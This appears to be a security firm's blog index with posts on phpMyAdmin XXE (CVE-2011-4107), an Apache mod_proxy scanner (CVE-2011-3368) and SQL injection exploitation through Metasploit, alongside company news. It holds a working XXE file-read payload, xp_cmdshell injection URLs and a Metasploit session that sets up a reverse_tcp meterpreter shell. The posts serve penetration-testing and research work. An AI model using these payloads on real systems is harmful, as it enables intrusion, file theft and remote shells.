SECFORCE :: Blog

Home : Blog

	CVE-2011-4107 PoC - phpMyAdmin Local File Inclusion via XXE injection Date: January 12th, 2012 An interesting local file inclusion vulnerability has been recently published. An XXE (XML eXternal Entity) injection attack, which affects phpMyAdmin 3.4.x previous to 3.4.7.1 and 3.3.x previous to 3.3.10.5. - CVE-2011-4107 The issue is located in the libraries\import\xml.php file, where the simplexml_load_string() function is called without validating the existence of a reference to an external entity on the file: $xml = simplexml_load_string($buffer, “SimpleXMLElement”, LIBXML_COMPACT); Patched versions make use of the libxml_disable_entity_loader() PHP function before loading the XML document, in order to prevent the injection. libxml_disable_entity_loader() function disables the ability to load external entities. phpMyAdmin offers the functionality of importing a database from a user-specified XML file. In vulnerable versions importing a specially-crafted XML file which contains an external XML entity permits an authenticated attacker to retrieve a local file from the server or network (limited by the privileges of the user running the web server). It is well understood that the LOAD_FILE MySQL function could be used to gain read access to files in the database file system, however there are configurations where phpMyAdmin is installed on a different host than the database and therefore exploitation of this issue could become handy in penetration testing engagements. SECFORCE has developed a metasploit module to assist the exploitation of this vulnerability. It is available for download from our security tools section on our website. This module automates the process of local file inclusion in the following way: Logging in into phpMyAdmin using provided credentials. Crafting an XML using XXE with the given file to read. Uploading the XML Retrieving the file from the server or network (restricted by the privileges of the user running the web server ). The module has the options shown in the following screenshot: An example of a successful run of the module is presented in the screenshot below: Example of successfully reading a file Defining XML external entity (XXE) injection attack as part of XML injection vulnerability: XML injection XML Injection is when is is possible to change the values of an XML document and the XML parser fails to make an appropriate data validation this way making the injection possible. XML external entity injection attack (XXE) “External Entity: The set of valid entities can be extended by defining new entities. If the definition of an entity is a URI, the entity is called an external entity. Unless configured to do otherwise, external entities force the XML parser to access the resource specified by the URI, e.g., a file on the local machine or on a remote systems. This behavior exposes the application to XML eXternal Entity (XXE) attacks, which can be used to perform denial of service of the local system, gain unauthorized access to files on the local machine, scan remote machines, and perform denial of service of remote systems.” - (OWASP-DV-008) XXE Example: <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo> phpMyAdmin has released patched versions available for download from here. Tags: CVE-2011-4107, Local file inclusion, phpMyAdmin, PoC, XEE injection Posted in Penetration Testing, Security research, Vulnerabilities, exploit
	CVE-2011-3368 PoC - Apache Proxy Scanner Date: October 10th, 2011 A recent Apache vulnerability has been made public whereby an attacker could gain unauthorised access to content in the DMZ network: The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x through 2.0.64, and 2.2.x through 2.2.21 does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers via a malformed URI containing an initial @ (at sign) character. SECFORCE has developed a proof of concept for this vulnerability, available for download from our security tools section on our website. The script exploits the vulnerability and allows the user to retrieve arbitrary known files from the DMZ. The tool can also be used to perform a port scan of the web server using the Apache proxy functionality, and therefore bypassing any firewall. The following output shows the usage of the tool: python apache_proxy_scanner.py CVE-2011-3368 proof of concept by Rodrigo Marcos http://www.secforce.co.uk usage(): python apache_scan.py [options] [options] -r: Remote Apache host -p: Remote Apache port (default is 80) -u: URL on the remote web server (default is /) -d: Host in the DMZ (default is 127.0.0.1) -e: Port in the DMZ (enables 'single port scan') -g: GET request to the host in the DMZ (default is /) -h: Help page examples: - Port scan of the remote host python apache_scan.py -r www.example.com -u /img/test.gif - Port scan of a host in the DMZ python apache_scan.py -r www.example.com -u /img/test.gif -d internalhost.local - Retrieve a resource from a host in the DMZ python apache_scan.py -r www.example.com -u /img/test.gif -d internalhost.local -e 80 -g /accounts/index.html The tool can be used to perform a portscan of the target host in the following way: python apache_proxy_scanner.py -r <target> -u <uri> The following screenshot shows the result of the command above: Apache proxy port scan results The script can be used to perform a bounce scan of a host in the DMZ or in the Internet: python apache_proxy_scanner.py -r 192.168.85.161 -u /rewrite/test -d internalhost python apache_proxy_scanner.py -r 192.168.85.161 -u /rewrite/test -d www.example.com Apache_proxy_scanner will report open/filtered/closed ports in internal and external hosts. Tags: Apache, apache_proxy_scanner, CVE-2011-3368, mod_proxy, mod_rewrite, Penetration Testing, PoC, SECFORCE Posted in Penetration Testing, Tools, Vulnerabilities
	Proxyfuzz fuzzer RPM binary Date: September 22nd, 2011 Proxyfuzz is now available in RPM format for Fedora users. Petr Sklenar has created and uploaded the RPM version, available for download here. Source code and windows binaries can still be found in the security research section of our website. Proxyfuzz is a protocol agnostic fuzzer which randomly fuzzes network traffic following a man-in-the-middle approach. The tool is designed to randomly inject a number of fuzzing signatures to the data that goes through it. It is incredibly easy to set up and can be used to research any TCP and UDP protocol. Tags: Fuzzing, network protocol fuzzing, proxyfuzz, research, RPM Posted in Fuzzing, SECFORCE, Security research
	SECFORCE is now CREST certified Date: July 25th, 2011 As part of the SECFORCE commitment to ensuring the provision of high quality services, SECFORCE has now achieved CREST certification. This will further complement the strong existing methodology and work of ethics. SECFORCE is already recognised as one of the leading penetration testing service providers in both the UK and Europe with the ability to demonstrate expertise and professionalism to ensure clients are totally satisfied. CREST Penetration Testing “CREST is a not for profit organisation which brings a demonstrable level of expertise and professionalism to security and penetration testing market. The bar for entry is set very high to protect the interests of the buying community and provide a clear differentiator for professional testing companies. There are very few companies in the UK who can meet the requirements of CREST and those that do, like SECFORCE, have had to demonstrated the processes they utilise for testing are sound, they have adopted industry best practice in their approach to testing and they handle sensitive client information in an appropriate manner.” Ian Glover, President of CREST The addition of CREST certification will provide further reassurance and confidence to the many clients where SECFORCE has already built a strong working relationship. “We are really pleased that CREST certification has been achieved and view this as an important step forward in the continue enhancement of our service delivery” Rodrigo Marcos, Technical Services Director For more information about our CREST assessments and discover how we can benefit your organization, please visit our CREST penetration testing page. Tags: CREST, CREST security, penetration test, Penetration Testing, SECFORCE Posted in CREST, Penetration Testing, SECFORCE
	GUI manipulation and penetration testing Date: July 15th, 2011 Whilst in the web application development world it is becoming very well understood that “you should never trust the data from the client side”, this is not always the case in local applications. In web environments any restriction enforced at the client side can be easily bypassed with the use of a web proxy. However, security mechanisms enforced in desktop applications sometimes can be manipulated to perform unauthorised actions. During a recent penetration test we found a desktop application which needed to be assessed in regard to security. GUI manipulation was used to conduct a number of attacks. The tool of choice for this particular attack was “DARKER’s Enabler“: Denabler used for GUI manipulation DARKER’s enabler is a tool which allows showing and enabling objects in Windows applications. The application to be tested had a number of disabled fields that required to be modified for the purpose of the penetration test. Specifically the “Encrypt” checkbox needed to be unchecked, however the application showed the field disabled: Original application window With Denabler we dragged-and-dropped the red square to the target application in order to identify de Windows handler of the field and then enabled it: Denabler in action The action enabled the field and allowed the penetration testers to disable the encryption in the application, which resulted vital in the outcome of the penetration test: Window after enabling the fields As shown above, GUI manipulation can lead to unwanted consequences. Extra caution needs to be exercised during the planning and development process to minimize the risk of GUI manipulation. Tags: application manipulation, application penetration testing, application security, Denabler, desktop security, GUI, gui manipulation, gui penetration test, Penetration Testing Posted in Penetration Testing, Tools
	SECFORCE invited to present at Athcon Date: June 18th, 2011 SECFORCE was invited to present at Athcon conference, held in Athens during 2nd and 3rd June 2011. AthCon is an annual IT security conference that takes place in Athens Greece designed to give a technical insight to the world of IT security. A realistic, practical view of current and evolving threats and security trends presented by top international security experts. SECFORCE presented a talk called “What you didn’t know about Metasploit”, covering the history of the Metasploit Framework, architecture, exploitation and post-exploitation features. The Metasploit Framework is mainly used for exploitation purposes during penetration testing engagements. You can download the slides from the talk from our security research area. Tags: Athcon, exploitation, metasploit, Penetration Testing, post-exploitation, presentations Posted in Penetration Testing, SECFORCE, Tools
	SECFORCE achieves quality management ISO 9001 certification Date: April 6th, 2011 SECFORCE has achieved recognition for its quality management systems with the award of ISO 9001:2008. The certification recognises the company’s commitment to quality management systems used in the delivery of IT security services to SECFORCE customers and to continuous improvement processes and procedures. For customers this achievement will enhance their confidence in the high quality of SECFORCE’s services and will guarantee a more efficient and effective business operation, increasing customer satisfaction. As quality is constantly measured and procedures ensure corrective actions are taken whenever defects occur, our clients will be benefited by an ever increasing excellent service. Certification was awarded by The British Assessment Bureau, a UKAS accredited authority, by a series of independent audits. Tags: client satisfaction, ISO9001, quality management, SECFORCE Posted in SECFORCE
	Benefits of penetration testing Date: February 23rd, 2011 One of the questions that we get from time to time is “Why should I conduct a penetration test?” Undoubtedly every business works in a different way and the value of conducting a penetration test varies in each case. Some businesses might manage IT security in a different way than others and therefore a penetration test might be relevant in different ways. However, it is possible to find some common ground which will almost certainly apply to every organization. The following list shows the main benefits of penetration testing: Manage Risk Properly For many organizations the foremost benefit of commissioning a penetration test is that it will give you a baseline to work upon in order to mitigate the risk in an structured and optimal way. A penetration test will show you the vulnerabilities in the target system and the risks associated to it. An educated valuation of the risk will be performed so that the vulnerabilities can be reported as High/Medium/Low risk issues. The categorization of the risk will allow you to tackle the highest risks first, maximising your resources and minimizing the risk efficiently. Increase Business Continuity Business continuity is usually the number one security concern for many organizations. A breach in the business continuity can happen due to a number of reasons. Lack of security is one of them. Insecure systems are more likely to suffer a breach in their availability than secured and hardened ones. Vulnerabilities can very often be exploited to produce a denial of service condition which usually crashes the vulnerable service and breaches the server availability. Penetration testing against mission critical systems needs to be coordinated, carefully planed and mindful in the execution. Minimize Client-side Attacks Penetration testing is an effective way of ensuring that successful highly targeted client-side attacks against key members of your staff are minimized. Security should be treated with a holistic approach. Companies only assessing the security of their servers run the risk of being targeted with client-side attacks exploiting vulnerabilities in software like web browsers, pdf readers, etc. It is important to ensure that the patch management processes are working properly updating the Operating System and third party applications. Protect Clients, Partners And Third Parties A security breach could affect not only the target organization, but also their clients, partners and third parties working with it. Taking the necessary actions towards security will enhance professional relationships building up trust and confidence. Comply With Regulation or Security Certification The compliance section in the ISO27001 standard requires managers and system owners to perform regular security reviews and penetration tests, unertaken by competent testers. PCI DSS also addresses penetration testing to relevant systems performed by qualified penetration testers. Evaluate Security Investment A snapshot of the current security posture and an opportunity to identify potential breach points. The penetration test will provide you with an independent view of the effectiveness of your existing security processes in place, ensuring that patching and configuration management practices have been followed correctly. This is an ideal opportunity to review the efficiency of the current security investment. What is working, what is not working and what needs to be improved. Protect Public Relationships And Brand Issues A good PR and brand position built up during years and with considerable investment can be suddenly change due to a security breach. Public perception of an organization is very sensitive to security issues and can have devastating consequences which may take years to repair. As this post explains, there are very valid reasons to perform a penetration test in your infrastructure. Contact us if you need some more details on how we can help you. Tags: benefits penetration testing, Business Continuity, client-side attacks, IT security investment, penetration, risk, Risk Management, Security Compliance, testing Posted in Business Continuity, Penetration Testing, Risk Management, Security Compliance
	Exploiting SQL injection vulnerabilities with Metasploit Date: January 27th, 2011 In this post we are going to show how to exploit a SQL injection vulnerability on a web application using Microsoft SQL server backend where xp_cmdshell is available to the attacker. Given a penetration test to a web application it is identified that it is vulnerable to SQL injection attacks and the penetration tester can execute administrative stored procedures: http://192.168.1.66/showproduct.asp?id=1;exec master..xp_cmdshell ‘ping 192.168.1.64′;– If the request shown above is successful then arbitrary commands could be executed in the host. At this point, there are a number of options that would allow the tester to fully compromise the server. There are public tools which could aid the attacker to automate the take over process. This post will cover the use of a Metasploit module. The mssql_payload_sqli module will execute any Windows payload on the target host. In this example we will execute meterpreter which is one of the payloads that offers great flexibility to the penetration tester. It is necessary to specify the exact point where the SQL injection vulnerability is. We do that by entering the GET_PATH variable with an [SQLi] token. The token will be the place where the payload will be executed. The rest of the exploitation process is the same as any other vulnerability, this is the exploitation based on the URL shown above: msf > use windows/mssql/mssql_payload_sqli msf exploit(mssql_payload_sqli) > set GET_PATH http://192.168.1.66/ showproduct.asp?id=1;[SQLi];-- GET_PATH => http://192.168.1.66/ showproduct.asp?id=1;[SQLi];-- msf exploit(mssql_payload_sqli) > set RHOST 192.168.1.66 RHOST => 192.168.1.66 msf exploit(mssql_payload_sqli) > set PAYLOAD windows/patchupmeterpreter/reverse_tcp PAYLOAD => windows/patchupmeterpreter/reverse_tcp msf exploit(mssql_payload_sqli) > set LHOST 192.168.1.64 LHOST => 192.168.1.64 msf exploit(mssql_payload_sqli) > set LPORT 80 LPORT => 80 msf exploit(mssql_payload_sqli) > exploit After the exploitation the attacker will get a meterpreter shell. SQL injection exploitation with Metasploit If you want to use this code you can download it from Secforce security tools repository. Tags: exploitation, metasploit, ms sql server, Penetration Testing, sql injection Posted in Penetration Testing, SECFORCE, SQL Server, Tools, Vulnerabilities, exploit, sql injection
	Exploiting MS09-004 via SQL injection Date: January 24th, 2011 Recently we were performing an web application penetration test to one of our clients and identified a SQL injection vulnerability. The vulnerability allowed us to conduct a degree of fingerprinting on the remote server; however, the Microsoft SQL Server back-end database didn’t allow to execute commands via the well known xp_cmdshell stored procedure. Based on the fingerprinting information we identified that the database server was running an old and vulnerable version of MS SQL server. Microsoft SQL Sever 2000 SP3, to be precise. All indicated that the server was vulnerable to MS09-004 vulnerability. However, it was not possible to get direct access to the database. Moreover no authentication credentials were discovered during the course of the assessment. This is how our newly released Metasploit module was born. We coded an extension which can be added to Metasploit to exploit this vulnerability using a SQL injection vulnerability with no need of using credentials, as the web application will authenticate in our behalf. Penetration testing - SQL injection exploitation The screenshot above shows how to get meterpreter (or any other payload of your choice) exploiting the vulnerability from Metasploit. If interested, get the scripts from our security tools area. Tags: exploitation, metasploit, MS09-004, SECFORCE, sql injection, Tools Posted in Penetration Testing, Tools, exploit